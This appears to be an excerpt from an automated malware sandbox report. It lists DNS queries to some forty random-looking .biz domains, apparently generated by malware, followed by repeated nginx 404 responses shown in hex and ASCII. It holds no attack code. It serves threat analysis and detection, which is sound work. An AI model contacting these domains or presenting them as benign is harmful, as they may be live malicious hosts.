Source: global traffic	DNS traffic detected: DNS query: uaafd.biz
Source: global traffic	DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic	DNS traffic detected: DNS query: pwlqfu.biz
Source: global traffic	DNS traffic detected: DNS query: rrqafepng.biz
Source: global traffic	DNS traffic detected: DNS query: ctdtgwag.biz
Source: global traffic	DNS traffic detected: DNS query: tnevuluw.biz
Source: global traffic	DNS traffic detected: DNS query: whjovd.biz
Source: global traffic	DNS traffic detected: DNS query: gjogvvpsf.biz
Source: global traffic	DNS traffic detected: DNS query: reczwga.biz
Source: global traffic	DNS traffic detected: DNS query: bghjpy.biz
Source: global traffic	DNS traffic detected: DNS query: damcprvgv.biz
Source: global traffic	DNS traffic detected: DNS query: ocsvqjg.biz
Source: global traffic	DNS traffic detected: DNS query: ywffr.biz
Source: global traffic	DNS traffic detected: DNS query: ecxbwt.biz
Source: global traffic	DNS traffic detected: DNS query: pectx.biz
Source: global traffic	DNS traffic detected: DNS query: zyiexezl.biz
Source: global traffic	DNS traffic detected: DNS query: banwyw.biz
Source: global traffic	DNS traffic detected: DNS query: muapr.biz
Source: global traffic	DNS traffic detected: DNS query: wxgzshna.biz
Source: global traffic	DNS traffic detected: DNS query: zrlssa.biz
Source: global traffic	DNS traffic detected: DNS query: jlqltsjvh.biz
Source: global traffic	DNS traffic detected: DNS query: xyrgy.biz
Source: global traffic	DNS traffic detected: DNS query: htwqzczce.biz
Source: global traffic	DNS traffic detected: DNS query: kvbjaur.biz
Source: global traffic	DNS traffic detected: DNS query: uphca.biz
Source: global traffic	DNS traffic detected: DNS query: fjumtfnz.biz
Source: global traffic	DNS traffic detected: DNS query: hlzfuyy.biz
Source: global traffic	DNS traffic detected: DNS query: rffxu.biz
Source: global traffic	DNS traffic detected: DNS query: cikivjto.biz
Source: global traffic	DNS traffic detected: DNS query: qncdaagct.biz
Source: global traffic	DNS traffic detected: DNS query: shpwbsrw.biz
Source: global traffic	DNS traffic detected: DNS query: cjvgcl.biz
Source: global traffic	DNS traffic detected: DNS query: neazudmrq.biz
Source: global traffic	DNS traffic detected: DNS query: pgfsvwx.biz
Source: global traffic	DNS traffic detected: DNS query: aatcwo.biz
Source: global traffic	DNS traffic detected: DNS query: kcyvxytog.biz
Source: global traffic	DNS traffic detected: DNS query: nwdnxrd.biz
Source: global traffic	DNS traffic detected: DNS query: ereplfx.biz
Source: global traffic	DNS traffic detected: DNS query: ptrim.biz
Source: global traffic	DNS traffic detected: DNS query: znwbniskf.biz

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:27 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
